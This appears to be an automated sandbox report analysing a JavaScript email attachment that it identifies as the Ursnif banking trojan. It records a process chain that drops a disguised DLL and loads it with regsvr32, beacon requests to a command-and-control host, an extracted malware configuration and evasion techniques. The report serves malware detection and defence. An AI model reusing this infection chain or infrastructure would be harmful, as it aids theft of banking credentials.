
Analysis Report view_attach_i1j.js

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 228101
Start date: 06.05.2020
Start time: 22:44:30
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 36s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: view_attach_i1j.js
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name: Without Instrumentation
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.bank.troj.evad.winJS@10/3@2/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 5.6% (good quality ratio 5.2%)
  • Quality average: 78%
  • Quality standard deviation: 28.5%
HCA Information:
  • Successful, ratio: 66%
  • Number of executed functions: 48
  • Number of non-executed functions: 59
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, ielowutil.exe, WMIADAP.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 2.18.68.82, 93.184.221.240, 23.61.218.119
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, e11290.dspg.akamaiedge.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, go.microsoft.com.edgekey.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 92
Range: 0 - 100
Whitelisted: false
Threat: Ursnif
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification Spiderchart

Analysis Advice

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Techniques listed per tactic column; the number in parentheses is the count attached to that technique in the original matrix.

  • Initial Access: Valid Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment
  • Execution: Windows Management Instrumentation (2), Scripting (2), Execution through API (13), Exploitation for Client Execution (1), Graphical User Interface (1), Graphical User Interface, Scripting
  • Persistence: Winlogon Helper DLL, Port Monitors, Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service, Path Interception
  • Privilege Escalation: Process Injection (12), Accessibility Features, Path Interception, DLL Search Order Hijacking, File System Permissions Weakness, New Service, Scheduled Task
  • Defense Evasion: Masquerading (11), Process Injection (12), Scripting (2), Obfuscated Files or Information (2), DLL Side-Loading (1), DLL Search Order Hijacking, Software Packing
  • Credential Access: Credential Dumping, Network Sniffing, Input Capture, Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception
  • Discovery: System Time Discovery (1), Process Discovery (1), Account Discovery (1), System Owner/User Discovery (1), Security Software Discovery (1), File and Directory Discovery (2), System Information Discovery (34)
  • Lateral Movement: Remote File Copy (3), Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash
  • Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Data Staged, Screen Capture, Email Collection
  • Exfiltration: Data Encrypted (1), Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel
  • Command and Control: Standard Cryptographic Protocol (1), Remote File Copy (3), Standard Non-Application Layer Protocol (3), Standard Application Layer Protocol (3), Standard Cryptographic Protocol, Commonly Used Port, Uncommonly Used Port
  • Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points
  • Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
  • Impact: Modify System Partition, Device Lockout, Delete Device Data, Premium SMS Toll Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact

Signature Overview

AV Detection:

Found malware configuration
Source: regsvr32.exe.4512.4.memstr, Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "337", "system": "e8a5b28f2e21add3528954a373c9ff9ahh!", "size": "200776", "crc": "2", "action": "00000000", "id": "2000", "time": "1588830398", "user": "31b341dd54c8a3b79c4b2eb545ab75a4", "hash": "0x7d10c6e1", "soft": "3"}

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_02DA7EE6 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_02DA7EE6
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE6C38E FindFirstFileExA,4_2_6EE6C38E

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\SysWOW64\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Downloads files from webservers via HTTP
Source: global traffic, HTTP traffic detected:
  GET /api1/WdKuVYoasB88JK_2FtDw/B63tIrb_2BPnzWpbDhM/rXAfCU2MEwh_2FPKKbrp7W/70vCTyr3ieZmP/Aol0rorW/GJTbkhfvuzTBgE3CVgeIDbb/TiWjJqN0Mk/QTAO9ICqeQB9ZNH85/skQEio7KvkSE/KXxE4ne_2Fm/S_2BN4AEsl796t/1DnjGyXPBUrEl49fw15xp/lJWGqem2Cibf8NoN/rXTvyhjzsWVobld/I5M34V0A6YD5sTODt1/3H7XvZKpf/u40faZz5KRogy6_0A_0D/2Jr3mApOs18XiaZ171T/6NhWBkC21cP2CAgdhU1ltm/l8H5Ag HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: fs.ramtool.at
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: fs.ramtool.at
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /api1/MT37giYB2/ETUHnK6p_2FxAqeo_2BP/SQCgSOI4voBI8I_2FEh/upEgwRFkJrom24MXZFGmOr/kUcDio50NRTme/eRK7DE_2/B3LrxnqljZFMT3mjkf7lfcz/Qa9s1EO1gs/q8qGzvYiAs2BrwNGF/_2BKdUYjnO7B/vIbjjlh_2BV/Yu1IBmvjReGSfM/HHntovtG0gsFru9j3aB4z/I0ImysbMU14KNz16/YYgA1NWr9Yusv1p/L_2BXswOA9Y8ZxqogX/0AK9I4ewD/Xm4ss81cN_0A_0D3ZIe5/m0b_2BSs7yv0FXHs8aQ/D14lauOZdxPRz_2FBpk1Fo/OMBd1SzkUXbT7/shpvP5GVW2/qYY HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: fs.ramtool.at
  Connection: Keep-Alive
Performs DNS lookups
Source: unknown, DNS traffic detected: queries for: fs.ramtool.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Wed, 06 May 2020 20:46:38 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match, File source: 00000004.00000003.1128248157.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.1127990612.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.1157819939.00000000055FB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.1128423151.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.1127823984.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.1128531702.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.1128488327.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.1128128667.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000003.1128341162.0000000005778000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 4512, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match (same memory dump sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Abnormal high CPU Usage
Source: C:\Windows\System32\wscript.exe, Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE51652 NtMapViewOfSection,4_2_6EE51652
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE5113E GetProcAddress,NtCreateSection,memset,4_2_6EE5113E
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE52765 NtQueryVirtualMemory,4_2_6EE52765
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_02DA1EAA NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_02DA1EAA
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE52544
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_02DAAA84
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_02DA172E
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE61C80
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE66D10
Java / VBScript file with very long strings (likely obfuscated code)
Source: view_attach_i1j.js, Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\regsvr32.exe, Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: sfc.dll
Classification label
Source: classification engine, Classification label: mal92.bank.troj.evad.winJS@10/3@2/1
Creates files inside the user directory
Source: C:\Program Files\internet explorer\iexplore.exe, File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Creates temporary files
Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\njtgDDroR.txt
Reads ini files
Source: C:\Windows\System32\wscript.exe, File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_i1j.js'
Source: unknown, Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt
Source: unknown, Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt
Source: unknown, Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2680 CREDAT:17410 /prefetch:2
Source: unknown, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2680 CREDAT:82950 /prefetch:2
Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt
Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt
Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2680 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2680 CREDAT:82950 /prefetch:2
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Found graphical window changes (likely an installer)
Source: Window Recorder, Window detected: More than 3 window changes detected
Submission file is bigger than most known malware samples
Source: view_attach_i1j.js, Static file information: File size 3134701 > 1048576
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: c:\night\beat\flow\Catch\Range\Solve\BuildGood.pdb source: regsvr32.exe, 00000004.00000002.1226810675.000000006EE7C000.00000002.00020000.sdmp, njtgDDroR.txt.0.dr

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE524E0 push ecx; ret 4_2_6EE524E9
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE52533 push ecx; ret 4_2_6EE52543
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_02DAAA73 push ecx; ret 4_2_02DAAA83
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_02DAA740 push ecx; ret 4_2_02DAA749
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE6B6D6 push esp; retf 4_2_6EE6B6D7
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE6DABB push dword ptr [esp+ecx-75h]; iretd 4_2_6EE6DABF
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE6B0D3 push esp; retf 4_2_6EE6B0E0
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE75832 push C7898BFFh; iretd 4_2_6EE75837
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE7517D push eax; ret 4_2_6EE75187

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\njtgDDroR.txt
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe, File created: C:\Users\user\AppData\Local\Temp\njtgDDroR.txt

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match (same memory dump sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regsvr32.exe, Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Windows\SysWOW64\regsvr32.exe, Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe, Window found: window name: WSH-Timer
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\regsvr32.exe, Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain (may stop execution after checking a module file name)
Source: C:\Windows\SysWOW64\regsvr32.exe, Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe, Check user administrative privileges: GetTokenInformation,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\regsvr32.exe, Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_02DA7EE6 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_02DA7EE6
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE6C38E FindFirstFileExA,4_2_6EE6C38E
Program exit points
Source: C:\Windows\SysWOW64\regsvr32.exe, API call chain: ExitProcess graph end node

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE51C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,4_2_6EE51C57
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE62D32 mov eax, dword ptr fs:[00000030h] 4_2_6EE62D32
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE9B849 mov eax, dword ptr fs:[00000030h] 4_2_6EE9B849
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE9B389 push dword ptr fs:[00000030h] 4_2_6EE9B389
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE9B77F mov eax, dword ptr fs:[00000030h] 4_2_6EE9B77F
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE6CFDB GetProcessHeap,4_2_6EE6CFDB
Contains functionality to register its own exception handler
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE5223F InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,4_2_6EE5223F

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe, File created: njtgDDroR.txt.0.dr
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt
May try to detect the Windows Explorer process (often used for injection)
Source: regsvr32.exe, 00000003.00000002.1223273536.0000000000BE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1224369222.0000000003580000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.1223273536.0000000000BE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1224369222.0000000003580000.00000002.00000001.sdmp, Binary or memory string: Progman
Source: regsvr32.exe, 00000003.00000002.1223273536.0000000000BE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1224369222.0000000003580000.00000002.00000001.sdmp, Binary or memory string: hProgram ManagerWE
Source: regsvr32.exe, 00000003.00000002.1223273536.0000000000BE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1224369222.0000000003580000.00000002.00000001.sdmp, Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,4_2_6EE510EC
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: GetLocaleInfoW,4_2_6EE676DA
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: GetLocaleInfoW,4_2_6EE70654
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_6EE70721
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: EnumSystemLocalesW,LdrInitializeThunk,4_2_6EE67335
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: EnumSystemLocalesW,4_2_6EE700AC
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: EnumSystemLocalesW,4_2_6EE70061
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: GetLocaleInfoW,4_2_6EE70424
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: GetLocaleInfoW,4_2_6EE70422
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_6EE6FDE9
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: EnumSystemLocalesW,4_2_6EE70147
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6EE7054D
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_02DA39DF cpuid 4_2_02DA39DF
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Contains functionality to query local / system time
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE51C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,4_2_6EE51C57
Contains functionality to query the account / user name
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_02DA39DF GetUserNameW,GetUserNameW,HeapFree,HeapFree,4_2_02DA39DF
Contains functionality to query windows version
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 4_2_6EE517E2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,4_2_6EE517E2
Queries the cryptographic machine GUID
Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match (same memory dump sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match (same memory dump sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "337", "system": "e8a5b28f2e21add3528954a373c9ff9ahh!", "size": "200776", "crc": "2", "action": "00000000", "id": "2000", "time": "1588830398", "user": "31b341dd54c8a3b79c4b2eb545ab75a4", "hash": "0x7d10c6e1", "soft": "3"}

Behavior Graph


Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source: fs.ramtool.at
Detection: 2%
Scanner: Virustotal

URLs

Source: http://fs.ramtool.at/favicon.ico
Detection: 0%
Scanner: Avira URL Cloud
Label: safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source: 00000004.00000003.1128248157.0000000005778000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 00000004.00000003.1127990612.0000000005778000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 00000004.00000003.1157819939.00000000055FB000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 00000004.00000003.1128423151.0000000005778000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 00000004.00000003.1127823984.0000000005778000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 00000004.00000003.1128531702.0000000005778000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 00000004.00000003.1128488327.0000000005778000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 00000004.00000003.1128128667.0000000005778000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: 00000004.00000003.1128341162.0000000005778000.00000004.00000040.sdmp; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security
Source: Process Memory Space: regsvr32.exe PID: 4512; Rule: JoeSecurity_Ursnif; Description: Yara detected Ursnif; Author: Joe Security

Unpacked PEs

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load
Source: Process started. Author: Florian Roth. Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_i1j.js', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2972, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\njtgDDroR.txt, ProcessId: 2396

Sigma detected: Regsvr32 Anomaly
